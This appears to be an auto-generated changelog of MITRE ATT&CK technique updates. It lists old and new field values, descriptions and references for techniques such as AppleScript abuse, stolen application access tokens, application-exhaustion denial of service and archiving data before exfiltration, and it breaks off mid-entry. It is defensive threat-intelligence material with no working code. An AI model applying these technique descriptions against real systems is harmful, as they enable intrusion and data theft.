| external_references | {'source_name': 'tlseminar_downgrade_att', 'description': 'Team Cinnamon. (2017, February 3). Downgrade Attacks. Retrieved December 9, 2021.', 'url': 'https://tlseminar.github.io/downgrade-attacks/'} | |
| external_references | {'source_name': 'ttint_rat', 'description': 'Tu, L. Ma, Y. Ye, G. (2020, October 1). Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities. Retrieved October 28, 2021.', 'url': 'https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/94.html', 'external_id': 'CAPEC-94'} | |
| x_mitre_contributors | Mayuresh Dani, Qualys | |
| x_mitre_contributors | NEC | |
| x_mitre_data_sources | Application Log: Application Log Content | |
| x_mitre_data_sources | Service: Service Creation | |
| x_mitre_platforms | Network | |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Service: Service Creation | |

| Old Description | New Description |
|---|---|
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript) AppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility. Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs) |
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call osascript to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| x_mitre_remote_support | False | |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-08-03 21:40:51.878000+00:00 | 2022-10-19 15:37:28.071000+00:00 |
| description | Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs) |
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call osascript to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs) |
| external_references[2]['source_name'] | SentinelOne AppleScript | SentinelOne macOS Red Team |
| external_references[2]['description'] | Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020. | Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020. |
| external_references[2]['url'] | https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/ | https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/ |
| external_references[3]['source_name'] | SentinelOne macOS Red Team | SentinelOne AppleScript |
| external_references[3]['description'] | Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020. | Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020. |
| external_references[3]['url'] | https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/ | https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/ |

| Old Description | New Description |
|---|---|
| Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow. | Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow. |
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019. |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-593 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-02 17:18:55.891000+00:00 | 2022-10-21 17:01:05.286000+00:00 |
| description | Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow. | Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow. |
| external_references[1]['source_name'] | capec | Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/593.html | https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/ |
| external_references[2]['source_name'] | Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019 | AWS Logging IAM Calls |
| external_references[2]['description'] | Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019. | AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022. |
| external_references[2]['url'] | https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/ | https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html |
| external_references[3]['source_name'] | okta | AWS Temporary Security Credentials |
| external_references[3]['description'] | okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019. | AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022. |
| external_references[3]['url'] | https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen | https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html |
| external_references[5]['source_name'] | Staaldraad Phishing with OAuth 2017 | Google Cloud Service Account Credentials |
| external_references[5]['description'] | Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019. | Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022. |
| external_references[5]['url'] | https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/ | https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials |
| x_mitre_detection | Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs. | Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs. Additionally, administrators should review logs for calls to the AWS Security Token Service (STS) and usage of GCP service accounts in order to identify anomalous actions.(Citation: AWS Logging IAM Calls)(Citation: GCP Monitoring Service Account Usage) |
| x_mitre_version | 1.2 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'GCP Monitoring Service Account Usage', 'description': 'Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022.', 'url': 'https://cloud.google.com/iam/docs/service-account-monitoring'} | |
| external_references | {'source_name': 'okta', 'description': 'okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.', 'url': 'https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen'} | |
| external_references | {'source_name': 'Rhino Security Labs Enumerating AWS Roles', 'description': 'Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through ‘AssumeRole’. Retrieved April 1, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration'} | |
| external_references | {'source_name': 'Staaldraad Phishing with OAuth 2017', 'description': 'Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.', 'url': 'https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/593.html', 'external_id': 'CAPEC-593'} | |
| x_mitre_contributors | Jen Burns, HubSpot | |
| x_mitre_contributors | Ian Davila, Tidal Cyber | |
| x_mitre_platforms | Containers | |
| x_mitre_platforms | IaaS | |
| x_mitre_platforms | Azure AD |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Application Log: Application Log Content |
| Old Description | New Description |
|---|---|
| Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018) | Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:08:52.118000+00:00 | 2022-03-25 18:07:45.176000+00:00 |
| description | Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018) | Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018) |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Flow |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Flow |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger. | Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.(Citation: Prevailion DarkWatchman 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-26 15:44:27.068000+00:00 | 2022-04-19 02:07:41.751000+00:00 |
| description | Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger. | Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.(Citation: Prevailion DarkWatchman 2021) |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Prevailion DarkWatchman 2021', 'description': 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.', 'url': 'https://www.prevailion.com/darkwatchman-new-fileless-techniques/'} | |
| x_mitre_data_sources | Process: OS API Execution | |
| x_mitre_platforms | Linux |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution |
| Old Description | New Description |
|---|---|
| Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition. | Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition. Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware Corruption](https://attack.mitre.org/techniques/T1495), [Service Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:09:41.559000+00:00 | 2022-03-25 18:11:13.604000+00:00 |
| description | Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition. | Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition. Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware Corruption](https://attack.mitre.org/techniques/T1495), [Service Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems. |
| x_mitre_data_sources[0] | Sensor Health: Host Status | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Application Log: Application Log Content | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Sensor Health: Host Status |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Flow | Application Log: Application Log Content |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender. Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 16:36:55.831000+00:00 | 2022-01-04 18:44:10.398000+00:00 |
| x_mitre_data_sources[0] | Process: Process Creation | Script: Script Execution |
| x_mitre_data_sources[1] | Command: Command Execution | File: File Creation |
| x_mitre_data_sources[2] | File: File Creation | Process: Process Creation |
| x_mitre_data_sources[3] | Script: Script Execution | Command: Command Execution |
| Old Description | New Description |
|---|---|
| An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data. Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems. | Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) Additionally, xcopy on Windows can copy files and directories with a variety of options. Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Mayan Arora aka Mayan Mohan'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 21:54:37.374000+00:00 | 2022-04-20 17:17:48.612000+00:00 |
| description | An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data. Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems. | Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) Additionally, xcopy on Windows can copy files and directories with a variety of options. Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage) |
| external_references[1]['source_name'] | 7zip Homepage | WinRAR Homepage |
| external_references[1]['description'] | I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020. | A. Roshal. (2020). RARLAB. Retrieved February 20, 2020. |
| external_references[1]['url'] | https://www.7-zip.org/ | https://www.rarlab.com/ |
| external_references[2]['source_name'] | WinRAR Homepage | WinZip Homepage |
| external_references[2]['description'] | A. Roshal. (2020). RARLAB. Retrieved February 20, 2020. | Corel Corporation. (2020). WinZip. Retrieved February 20, 2020. |
| external_references[2]['url'] | https://www.rarlab.com/ | https://www.winzip.com/win/en/ |
| external_references[3]['source_name'] | WinZip Homepage | 7zip Homepage |
| external_references[3]['description'] | Corel Corporation. (2020). WinZip. Retrieved February 20, 2020. | I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020. |
| external_references[3]['url'] | https://www.winzip.com/win/en/ | https://www.7-zip.org/ |
| external_references[4]['source_name'] | Wikipedia File Header Signatures | diantz.exe_lolbas |
| external_references[4]['description'] | Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016. | Living Off The Land Binaries, Scripts and Libraries (LOLBAS). (n.d.). Diantz.exe. Retrieved October 25, 2021. |
| external_references[4]['url'] | https://en.wikipedia.org/wiki/List_of_file_signatures | https://lolbas-project.github.io/lolbas/Binaries/Diantz/ |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Wikipedia File Header Signatures', 'description': 'Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.', 'url': 'https://en.wikipedia.org/wiki/List_of_file_signatures'} |
| Old Description | New Description |
|---|---|
| Adversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. An adversary may use at.exe in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). Note: The at.exe command line utility has been deprecated in current versions of Windows in favor of schtasks. | Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of 